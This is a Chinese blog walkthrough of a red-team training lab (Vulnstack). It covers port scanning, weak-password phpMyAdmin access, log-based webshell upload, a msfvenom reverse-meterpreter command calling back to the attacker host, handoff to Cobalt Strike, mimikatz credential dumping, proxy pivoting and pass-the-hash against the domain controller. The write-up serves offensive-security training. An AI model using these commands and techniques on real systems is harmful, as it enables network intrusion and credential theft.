ATT&CK红队实战靶场初探(一)

admin 2021年12月7日10:44:53安全文章评论40 views1032字阅读3分26秒阅读模式

一、环境配置


靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2


攻击示意图:

ATT&CK红队实战靶场初探(一)


靶机统一使用虚拟机搭建


web服务器:windows7 ip:192.168.52.143/192.168.154.152


域成员:windows server 2003 ip:192.168.52.141


域控:windows server 2008 ip:192.168.52.138


攻击机:kali ip:192.168.154.146


二、外网打点


nmap扫描ip,看一下开了哪些端口


ATT&CK红队实战靶场初探(一)


开了80和3306,访问80

ATT&CK红队实战靶场初探(一)

是个探针,知道网站路径和php版本信息


上dirsearch扫一下目录

ATT&CK红队实战靶场初探(一)

有phpMyAdmin

ATT&CK红队实战靶场初探(一)

试下弱口令,root/root进去了


然后就是getshell,这里参考:https://cloud.tencent.com/developer/article/1540506,用的是日志getshell

ATT&CK红队实战靶场初探(一)

ATT&CK红队实战靶场初探(一)

ATT&CK红队实战靶场初探(一)

ATT&CK红队实战靶场初探(一)

写完shell蚁剑连上去,成功getshell

ATT&CK红队实战靶场初探(一)

ATT&CK红队实战靶场初探(一)

三、内网渗透


1、用msf生成exe上线,联动cs


msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.154.146 LPORT=4444 -f exe -o shell.exe


msf设置

ATT&CK红队实战靶场初探(一)

ATT&CK红队实战靶场初探(一)


通过蚁剑上传木马,执行

成功得到session

ATT&CK红队实战靶场初探(一)


打开cs,设置监听器

ATT&CK红队实战靶场初探(一)

在msf中使用exploit/windows/local/payload_inject模块,session设置为刚获得的session


set payload windows/meterpreter/reverse_http

ATT&CK红队实战靶场初探(一)

ATT&CK红队实战靶场初探(一)

执行,cs成功上线

2、信息收集


(1)mimikatz提取账号明文密码

ATT&CK红队实战靶场初探(一)


(2)post/windows/gather/enum_applications模块获取软件列表


ATT&CK红队实战靶场初探(一)



(3)get_local_subnets获取子网信息+内网流量转发(msf+proxychains)

ATT&CK红队实战靶场初探(一)



获得内网网段为192.168.52.0/24


run autoroute -s 192.168.52.0/24


添加路由让msf可以扫描网段


ATT&CK红队实战靶场初探(一)


msf运行socks4a模块,并且修改/etc/proxychains.conf的最后一行为相对应的代理端口

ATT&CK红队实战靶场初探(一)


(4)arp扫描内网存活主机

ATT&CK红队实战靶场初探(一)

(5)PTH攻击拿下域控

ATT&CK红队实战靶场初探(一)

ATT&CK红队实战靶场初探(一)


这里也有许多干货喔

↓↓↓


↑↑↑

欢迎关注(排名不分先后)




本文始发于微信公众号(F12sec):ATT&CK红队实战靶场初探(一)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月7日10:44:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  ATT&CK红队实战靶场初探(一) http://cn-sec.com/archives/442482.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: